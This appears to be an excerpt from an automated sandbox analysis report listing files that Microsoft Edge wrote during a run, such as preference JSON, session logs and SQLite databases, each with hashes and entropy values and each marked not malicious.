                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:LBtiuWkKcwF11DM/FAf4AadRZO7L0rqq9Hzfrlm:LLiuW9LFPY/Wf4A0o0rqqBzfrlm
                                                                                                                                                      MD5:DEF775235D5A2E4717325231A2344199
                                                                                                                                                      SHA1:078EB98F893421B4919AF394A51C11A237BB50F7
                                                                                                                                                      SHA-256:7A0ED33BFB099BB2F6F213E001BAF1953C00CF086958351BD040ADC580AFC373
                                                                                                                                                      SHA-512:9A86E02F6AE0642D59E753D009C4C7AA3E403197B7C8AE093D5D2036FE0616B11C573939C750168010A6771FF69E488D0C63967E47BF9AA800E61D0EB85A16E7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9560
                                                                                                                                                      Entropy (8bit):4.927538399430544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:sVC/SNo8oSHJ1u9b98cjaYSv3CG85Bh6Cp9/x+6M8muecmAeCgp+2O8QdBR2e4zc:sVISnJ+jaY8378tpj+FVAgOna291f
                                                                                                                                                      MD5:797895882111EAEB8A4CC35BDF76AB83
                                                                                                                                                      SHA1:B62C7ED9AA3D37F3512DE0A3FACA788015DD8254
                                                                                                                                                      SHA-256:03BA97F85E559F1FB5E1FF58DE43C1A76D2007BF6A5B157502B133F67DE35EF1
                                                                                                                                                      SHA-512:24044D0F00DD460AAB2900CD38BD5DF896F7EF78BAB3DC779273406F2922A071E1CE0E7CE4F43B5D25601342316DE04E27F10FA153D570F4852F09EFBAED430F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9560
                                                                                                                                                      Entropy (8bit):4.927538399430544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:sVC/SNo8oSHJ1u9b98cjaYSv3CG85Bh6Cp9/x+6M8muecmAeCgp+2O8QdBR2e4zc:sVISnJ+jaY8378tpj+FVAgOna291f
                                                                                                                                                      MD5:797895882111EAEB8A4CC35BDF76AB83
                                                                                                                                                      SHA1:B62C7ED9AA3D37F3512DE0A3FACA788015DD8254
                                                                                                                                                      SHA-256:03BA97F85E559F1FB5E1FF58DE43C1A76D2007BF6A5B157502B133F67DE35EF1
                                                                                                                                                      SHA-512:24044D0F00DD460AAB2900CD38BD5DF896F7EF78BAB3DC779273406F2922A071E1CE0E7CE4F43B5D25601342316DE04E27F10FA153D570F4852F09EFBAED430F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9560
                                                                                                                                                      Entropy (8bit):4.927538399430544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:sVC/SNo8oSHJ1u9b98cjaYSv3CG85Bh6Cp9/x+6M8muecmAeCgp+2O8QdBR2e4zc:sVISnJ+jaY8378tpj+FVAgOna291f
                                                                                                                                                      MD5:797895882111EAEB8A4CC35BDF76AB83
                                                                                                                                                      SHA1:B62C7ED9AA3D37F3512DE0A3FACA788015DD8254
                                                                                                                                                      SHA-256:03BA97F85E559F1FB5E1FF58DE43C1A76D2007BF6A5B157502B133F67DE35EF1
                                                                                                                                                      SHA-512:24044D0F00DD460AAB2900CD38BD5DF896F7EF78BAB3DC779273406F2922A071E1CE0E7CE4F43B5D25601342316DE04E27F10FA153D570F4852F09EFBAED430F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9560
                                                                                                                                                      Entropy (8bit):4.927538399430544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:sVC/SNo8oSHJ1u9b98cjaYSv3CG85Bh6Cp9/x+6M8muecmAeCgp+2O8QdBR2e4zc:sVISnJ+jaY8378tpj+FVAgOna291f
                                                                                                                                                      MD5:797895882111EAEB8A4CC35BDF76AB83
                                                                                                                                                      SHA1:B62C7ED9AA3D37F3512DE0A3FACA788015DD8254
                                                                                                                                                      SHA-256:03BA97F85E559F1FB5E1FF58DE43C1A76D2007BF6A5B157502B133F67DE35EF1
                                                                                                                                                      SHA-512:24044D0F00DD460AAB2900CD38BD5DF896F7EF78BAB3DC779273406F2922A071E1CE0E7CE4F43B5D25601342316DE04E27F10FA153D570F4852F09EFBAED430F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9560
                                                                                                                                                      Entropy (8bit):4.927538399430544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:sVC/SNo8oSHJ1u9b98cjaYSv3CG85Bh6Cp9/x+6M8muecmAeCgp+2O8QdBR2e4zc:sVISnJ+jaY8378tpj+FVAgOna291f
                                                                                                                                                      MD5:797895882111EAEB8A4CC35BDF76AB83
                                                                                                                                                      SHA1:B62C7ED9AA3D37F3512DE0A3FACA788015DD8254
                                                                                                                                                      SHA-256:03BA97F85E559F1FB5E1FF58DE43C1A76D2007BF6A5B157502B133F67DE35EF1
                                                                                                                                                      SHA-512:24044D0F00DD460AAB2900CD38BD5DF896F7EF78BAB3DC779273406F2922A071E1CE0E7CE4F43B5D25601342316DE04E27F10FA153D570F4852F09EFBAED430F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):33
                                                                                                                                                      Entropy (8bit):4.051821770808046
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                      MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                      SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                      SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                      SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"preferred_apps":[],"version":1}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25012
                                                                                                                                                      Entropy (8bit):5.567948718158369
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:hVsT75LWPd5f5I8F1+UoAYDCx9Tuqh0VfUC9xbog/OViHBSYrw9pituYdd:hVsT75LWPd5f5Iu1ja3hSJGtDd
                                                                                                                                                      MD5:1A843A9A071C3F77F2FE45EF8F8B7B15
                                                                                                                                                      SHA1:07CB178C466DEE5723514DF8EB2D678147E7B477
                                                                                                                                                      SHA-256:0987AA8120B5F343BD7F0DE3926F6DEA6920928256918E5BAB5C0D96677C4440
                                                                                                                                                      SHA-512:23356253834775779511CAD519FD46CC8A86C15ED3C123F03A95C7FDD5E95BE0D54C2EA41F9A4BA3B89386C1E632D5678359C78A203A84FDEDDC39C38E4C9AE6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790691749887","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790691749887","location":5,"ma
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25012
                                                                                                                                                      Entropy (8bit):5.567948718158369
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:hVsT75LWPd5f5I8F1+UoAYDCx9Tuqh0VfUC9xbog/OViHBSYrw9pituYdd:hVsT75LWPd5f5Iu1ja3hSJGtDd
                                                                                                                                                      MD5:1A843A9A071C3F77F2FE45EF8F8B7B15
                                                                                                                                                      SHA1:07CB178C466DEE5723514DF8EB2D678147E7B477
                                                                                                                                                      SHA-256:0987AA8120B5F343BD7F0DE3926F6DEA6920928256918E5BAB5C0D96677C4440
                                                                                                                                                      SHA-512:23356253834775779511CAD519FD46CC8A86C15ED3C123F03A95C7FDD5E95BE0D54C2EA41F9A4BA3B89386C1E632D5678359C78A203A84FDEDDC39C38E4C9AE6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790691749887","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790691749887","location":5,"ma
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25012
                                                                                                                                                      Entropy (8bit):5.567948718158369
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:hVsT75LWPd5f5I8F1+UoAYDCx9Tuqh0VfUC9xbog/OViHBSYrw9pituYdd:hVsT75LWPd5f5Iu1ja3hSJGtDd
                                                                                                                                                      MD5:1A843A9A071C3F77F2FE45EF8F8B7B15
                                                                                                                                                      SHA1:07CB178C466DEE5723514DF8EB2D678147E7B477
                                                                                                                                                      SHA-256:0987AA8120B5F343BD7F0DE3926F6DEA6920928256918E5BAB5C0D96677C4440
                                                                                                                                                      SHA-512:23356253834775779511CAD519FD46CC8A86C15ED3C123F03A95C7FDD5E95BE0D54C2EA41F9A4BA3B89386C1E632D5678359C78A203A84FDEDDC39C38E4C9AE6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790691749887","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790691749887","location":5,"ma
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):251
                                                                                                                                                      Entropy (8bit):2.6641733010661266
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljljljl:S85aEFljljljljljljljljljljl
                                                                                                                                                      MD5:22B21EF1C867F920688AD23503CC59B3
                                                                                                                                                      SHA1:2A7D083F7C8E2FEA6851D13A3FCB1F37A87D3E8D
                                                                                                                                                      SHA-256:7867C6DEC8A5FD95B544F7590EB8257CAD3F7E13E15A938EAA76F04966122C33
                                                                                                                                                      SHA-512:ACDE85DD18BBBB3622EECBA14DE7528723D09DB26C7AEAE4201A90763C0775809754BCEB7819171F7AC146C7F364DD8F4640AEB1070186338BA350B60D18313B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):322
                                                                                                                                                      Entropy (8bit):5.156075884063973
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjeiVUnVq2Pwkn23oH+TcwtrQMxIFUt8mjeiUSgZmw+mjeiJIIkwOwkn23oH+TcM:2FVvYfYebCFUt8JtX/+JK5JfYebtJ
                                                                                                                                                      MD5:74F4CCB51724DF0026AA7B5843D4C2A2
                                                                                                                                                      SHA1:C0E91AE75755E20E303952B8F30BB1D2E37260B8
                                                                                                                                                      SHA-256:8CCFEE94ADEDDD825F2E84B91D5D3912D589A9327BAAC61FD5201EA937BD4411
                                                                                                                                                      SHA-512:D94B3A53381C2BEA033DEE72A0E88DA51B53A486E13279387396F790F772DDED5176AB311FA002DBC8E531BE3AC8D2A3EF36BEDF314DBD65CECF830AFAE2007B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.742 1434 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/04-07:58:12.743 1434 Recovering log #3.2024/12/04-07:58:12.746 1434 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):322
                                                                                                                                                      Entropy (8bit):5.156075884063973
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjeiVUnVq2Pwkn23oH+TcwtrQMxIFUt8mjeiUSgZmw+mjeiJIIkwOwkn23oH+TcM:2FVvYfYebCFUt8JtX/+JK5JfYebtJ
                                                                                                                                                      MD5:74F4CCB51724DF0026AA7B5843D4C2A2
                                                                                                                                                      SHA1:C0E91AE75755E20E303952B8F30BB1D2E37260B8
                                                                                                                                                      SHA-256:8CCFEE94ADEDDD825F2E84B91D5D3912D589A9327BAAC61FD5201EA937BD4411
                                                                                                                                                      SHA-512:D94B3A53381C2BEA033DEE72A0E88DA51B53A486E13279387396F790F772DDED5176AB311FA002DBC8E531BE3AC8D2A3EF36BEDF314DBD65CECF830AFAE2007B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.742 1434 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/04-07:58:12.743 1434 Recovering log #3.2024/12/04-07:58:12.746 1434 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2025
                                                                                                                                                      Entropy (8bit):3.3105157987893685
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:3U6snBAU4RYJ00Rcf5MAqr+rrUB4/qr+cZ1wLWoJxSCx8GjrcmnU:3U6GB14ql6f1o+XUco+e1wqMxSxmnU
                                                                                                                                                      MD5:2DA62EBD5BF2E1CAEEA5110FCAC84C1F
                                                                                                                                                      SHA1:429E435604B65577F92BDB40A3DCE43F5B41063B
                                                                                                                                                      SHA-256:8434B4561EE55BAF255B3A81E0D4553756FEF9E440E115FB888E4C9CFE2ACCAF
                                                                                                                                                      SHA-512:64035DBF081F1C1859681702E5D726BDA9CDDCDB7983FE17C9A2B0B1F993B6307E1E390ED17366F6F3E3EF577CCC77FC500544ED25FDFC455B7F46D62E82854F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SNSS........~./............~./......".~./............~./........~./........~./........~./....!...~./................................~./.~./1..,....~./$...84da4f88_a08d_4b7c_80c7_3c1b29363098....~./........~./.....@..........~./....~./........................~./............~./....4...file:///C:/Users/user/AppData/Local/Temp/readme.pdf............!.......................................................................................................5..Uq(..6..Uq(..8.......P...............p.......................................................p...4...f.i.l.e.:./././.C.:./.U.s.e.r.s./.j.o.n.e.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.r.e.a.d.m.e...p.d.f.................................8.......0.......8....................................................................... .......................................................................(...............p...............h.......7..Uq(..8..Uq(..................................P.......................................................a.b.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20480
                                                                                                                                                      Entropy (8bit):0.44194574462308833
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                      MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                      SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                      SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                      SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):350
                                                                                                                                                      Entropy (8bit):5.204740303325239
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjzoVAQ+q2Pwkn23oH+Tcwt7Uh2ghZIFUt8mjzoVAgZmw+mjzTAQVkwOwkn23oHT:kqVvYfYebIhHh2FUt8xqg/+FI5JfYebs
                                                                                                                                                      MD5:A1AAE97CBE027401A8B7BFC5368B0757
                                                                                                                                                      SHA1:47B4047ECC0ACE0B7E0D056243A5BAF95ACED6C3
                                                                                                                                                      SHA-256:051EB6D40468278C3BC1019B146ACBA4CBEE5E1A782F8E3DF431AD48308FC24D
                                                                                                                                                      SHA-512:3CE958CFD6BA537A1169B25A352CFE2E36D386E7FF07FE3E52EE094A69F2E7EBC7877D983FF2F4A3C2502674DAFBB6ED9B2FF61C6D3D4868218DBE43A1374A17
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:11.668 1f48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/04-07:58:11.668 1f48 Recovering log #3.2024/12/04-07:58:11.669 1f48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):350
                                                                                                                                                      Entropy (8bit):5.204740303325239
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjzoVAQ+q2Pwkn23oH+Tcwt7Uh2ghZIFUt8mjzoVAgZmw+mjzTAQVkwOwkn23oHT:kqVvYfYebIhHh2FUt8xqg/+FI5JfYebs
                                                                                                                                                      MD5:A1AAE97CBE027401A8B7BFC5368B0757
                                                                                                                                                      SHA1:47B4047ECC0ACE0B7E0D056243A5BAF95ACED6C3
                                                                                                                                                      SHA-256:051EB6D40468278C3BC1019B146ACBA4CBEE5E1A782F8E3DF431AD48308FC24D
                                                                                                                                                      SHA-512:3CE958CFD6BA537A1169B25A352CFE2E36D386E7FF07FE3E52EE094A69F2E7EBC7877D983FF2F4A3C2502674DAFBB6ED9B2FF61C6D3D4868218DBE43A1374A17
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:11.668 1f48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/04-07:58:11.668 1f48 Recovering log #3.2024/12/04-07:58:11.669 1f48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):270336
                                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                      Malicious:false
